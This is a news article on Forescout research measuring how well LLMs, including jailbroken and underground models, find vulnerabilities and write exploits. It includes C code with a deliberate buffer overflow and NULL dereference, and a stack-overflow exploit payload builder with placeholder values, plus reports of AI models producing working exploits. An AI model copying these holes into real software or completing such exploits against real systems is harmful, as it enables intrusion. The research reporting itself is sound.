Putting AI-assisted ‘vibe hacking’ to the test

by Wikdaily

Attackers are increasingly leveraging large language models (LLMs) to enhance attack workflows, but for all their advances in helping to write malicious scripts, these tools are not yet ready to turn run-of-the-mill cybercriminals into exploit developers.

According to tests performed by researchers from Forescout, LLMs have gotten fairly good at coding — particularly at vibe coding, the practice of using LLMs to produce applications through natural language prompts — but they are not yet as good at “vibe hacking.”

Forescout’s tests of more than 50 LLMs, spanning commercial models from AI companies that enforce safety restrictions on malicious content as well as open-source models with safeguards removed, revealed high failure rates for both vulnerability research and exploit development tasks.

“Even when models completed exploit development tasks, they required substantial user guidance, or manually steering the model toward viable exploitation paths,” the researchers found. “We are still far from LLMs that can autonomously generate fully functional exploits.”

However, many LLMs are improving fast, the researchers warn, having observed this over their three-month testing window. Tasks that initially failed in test runs in February became more feasible by April, with the latest reasoning models consistently outperforming traditional LLMs.

The rise of agentic AI, where models are capable of chaining multiple actions and tools, will likely reduce the hurdles that AI currently faces with complex tasks like exploit development, which requires debugging, tool orchestration, and the ability to incorporate feedback into the workflow.

As such, the researchers conclude that while AI has not fully transformed how threat actors discover vulnerabilities and develop exploits, “the age of ‘vibe hacking’ is approaching, and defenders should start preparing now.”

This echoes what other security researchers and penetration testers shared with CSO earlier this year about how AI will impact the zero-day vulnerability and exploit ecosystem.

Simulating an opportunistic attacker

An attacker or researcher with significant experience in vulnerability research can find LLMs useful for automating some of their work, but only because they have the knowledge to guide the models and correct their mistakes.

Most cybercriminals looking to do the same won’t fare as well, whether using a general-purpose AI model from OpenAI, Google, or Anthropic, or one of the many uncensored and jailbroken ones currently advertised on underground markets, such as WormGPT, WolfGPT, FraudGPT, LoopGPT, DarkGPT, DarkBert, PoisonGPT, EvilGPT, EvilAI, or GhostGPT, among others.

For their tests, Forescout’s researchers operated under the assumption that opportunistic attackers would want such models to return largely accurate results from basic prompts like “find a vulnerability in this code” and “write an exploit for the following code.”

The researchers chose two vulnerability research tasks from the STONESOUP dataset published by the Intelligence Advanced Research Projects Activity (IARPA), part of the US government’s Office of the Director of National Intelligence. One was a buffer overflow vulnerability in C code for a simple TFTP server; the other was a more complex null pointer dereference vulnerability in a server-side application, also written in C.
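
The report does not reproduce the STONESOUP test programs, but both bug classes are textbook C flaws. The sketch below is a hypothetical illustration of the kind of code the models were asked to analyze, not the actual test cases: an unchecked copy into a fixed-size stack buffer, and a lookup result dereferenced without a NULL check.

/* Hypothetical illustration of the two bug classes tested; not the STONESOUP code. */
#include <stdio.h>
#include <string.h>

/* Bug class 1: buffer overflow. A TFTP-style request filename is copied into a
   fixed-size stack buffer with no length check. */
void handle_request(const char *filename) {
    char path[64];
    strcpy(path, filename);                 /* overflows path if filename is 64+ bytes */
    printf("serving %s\n", path);
}

/* Bug class 2: null pointer dereference. A lookup that can fail is used
   without checking its result. */
struct session { int id; };

struct session *find_session(int id) {
    (void)id;
    return NULL;                            /* stand-in for a lookup that found nothing */
}

void close_session(int id) {
    struct session *s = find_session(id);
    printf("closing session %d\n", s->id);  /* crashes when s is NULL */
}

int main(int argc, char **argv) {
    if (argc > 1)
        handle_request(argv[1]);
    close_session(42);
    return 0;
}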

For exploit development, the researchers selected two challenges from the IO NetGarage wargame: a level 5 challenge to write an arbitrary code execution exploit for a stack overflow vulnerability, and a level 9 challenge for a code execution exploit that involved leaking memory information.
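
The wargame source isn’t included in the report, but the level 5 task belongs to a well-known class: overflow a stack buffer, overwrite the saved return address, and redirect execution to attacker-controlled code. A minimal sketch of the payload-building side of such an exploit might look like the following; the offset and address are invented placeholders, and real values would come from debugging the target binary.

/* Hypothetical sketch of a stack-overflow exploit payload generator; the
   offset and return address below are made-up placeholders, not values for
   the actual IO NetGarage challenge. */
#include <stdio.h>
#include <string.h>

int main(void) {
    unsigned char payload[256];
    unsigned int fake_ret = 0xffffd580u;   /* assumed 4-byte address of injected code */
    size_t offset = 140;                   /* assumed distance from buffer start to saved return address */

    memset(payload, 'A', offset);                           /* filler up to the saved return address */
    memcpy(payload + offset, &fake_ret, sizeof(fake_ret));  /* overwrite it with the target address */
    fwrite(payload, 1, offset + sizeof(fake_ret), stdout);  /* pipe this into the vulnerable program */
    return 0;
}

The level 9 task adds a step: before such an overwrite can be aimed correctly, the exploit typically has to leak memory contents from the running process, such as an address revealing where the payload or a needed library resides, which is the “leaking memory information” the researchers refer to.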

“While we did not adhere to a formal prompt engineering methodology, all prompts were manually crafted and iteratively refined based on early errors,” the researchers wrote. “No in-context examples were included. Therefore, while our testing was rigorous, the results may not reflect the full potential of each LLM. Further improvements might be possible with advanced techniques, but that was not our goal. We focused on assessing what an opportunistic attacker, with limited tuning or optimization, could realistically achieve.”

Underwhelming results

For each LLM, the researchers ran each task prompt five times to account for variability in responses. For exploit development tasks, models that failed the first task were not allowed to progress to the second, more complex one. The team tested 16 open-source models from Hugging Face that claimed to have been trained for cybersecurity tasks and to be jailbroken or uncensored, 23 models shared on cybercrime forums and Telegram chats for attack purposes, and 18 commercial models.

Open-source models performed the worst across all tasks. Only two reasoning models had partially correct responses to one of the vulnerability research tasks, but these too failed the second, more complex research task, as well as the first exploit development task.

Of the 23 underground models collected by the researchers, only 11 could be successfully tested via Telegram bots or web-based chat interfaces. These returned better results than the open-source models but ran into context length issues, with Telegram messages limited to 4,096 characters. Their responses were also riddled with false positives and false negatives, and problems such as context loss across prompts and daily limits on the number of prompts made them impractical for exploit development tasks in particular, which require troubleshooting and feedback loops.

“Web-based models all succeeded in ED1 [exploit development task 1], though some used overly complex techniques,” the researchers found. “WeaponizedGPT was the most efficient, producing a working exploit in just two iterations. FlowGPT models struggled again with code formatting, which hampered usability. In ED2, all models that passed ED1, including the three FlowGPT variants, WeaponizedGPT, and WormGPT 5, failed to fully solve the task.”

The researchers failed to obtain access to the remaining 12 underground models, either because the projects had been abandoned, the sellers declined to offer a free prompt demo, or the free demo’s results weren’t good enough to justify paying the high price to send more prompts.

Commercial LLMs, both hacking-focused and general purpose, performed the best, particularly in the first vulnerability research task, although some hallucinated. ChatGPT o4 and DeepSeek R1, both reasoning models, provided the best results, along with PentestGPT, which has both a free and paid version. PentestGPT was the only hacking-oriented commercial model that managed to write a functional exploit for the first exploit development task.

In total, nine commercial models succeeded on ED1, but DeepSeek V3 stood out by writing a functional exploit on the first run, with no debugging needed. DeepSeek V3 was also one of three models to successfully complete ED2, along with Gemini Pro 2.5 Experimental and ChatGPT o3-mini-high.

“Modern exploits often demand more skill than the controlled challenges we tested,” the researchers noted. “Even though most commercial LLMs succeeded in ED1 and a few in ED2, several recurring issues exposed the limits of current LLMs. Some models suggested unrealistic commands, like disabling ASLR before gaining root privileges, failed to perform fundamental arithmetic, or fixated on an incorrect approach. Others stalled or offered incomplete responses, sometimes due to load balancing or context loss, especially under multi-step reasoning demands.”

LLMs not useful for most wannabe vulnerability hunters yet

Forescout’s researchers don’t believe that LLMs have lowered the barrier to entry into vulnerability research and exploit development just yet, because the current models have too many problems for novice cybercriminals to overcome.

Reviewing discussions from cybercriminal forums, the researchers found that most enthusiasm about LLMs comes from less experienced attackers, with veterans expressing skepticism about the utility of such tools.

But advances in agentic AI and improvements in reasoning models may soon change the equation. Companies must continue to practice cybersecurity fundamentals, including defense-in-depth, least privilege, network segmentation, cyber hygiene, and zero trust access.

“If AI lowers the barrier to launching attacks, we may see them become more frequent, but not necessarily more sophisticated,” the researchers surmised. “Rather than reinventing defensive strategies, organizations should focus on enforcing them more dynamically and effectively across all environments. Importantly, AI is not only a threat, it is a powerful tool for defenders.”
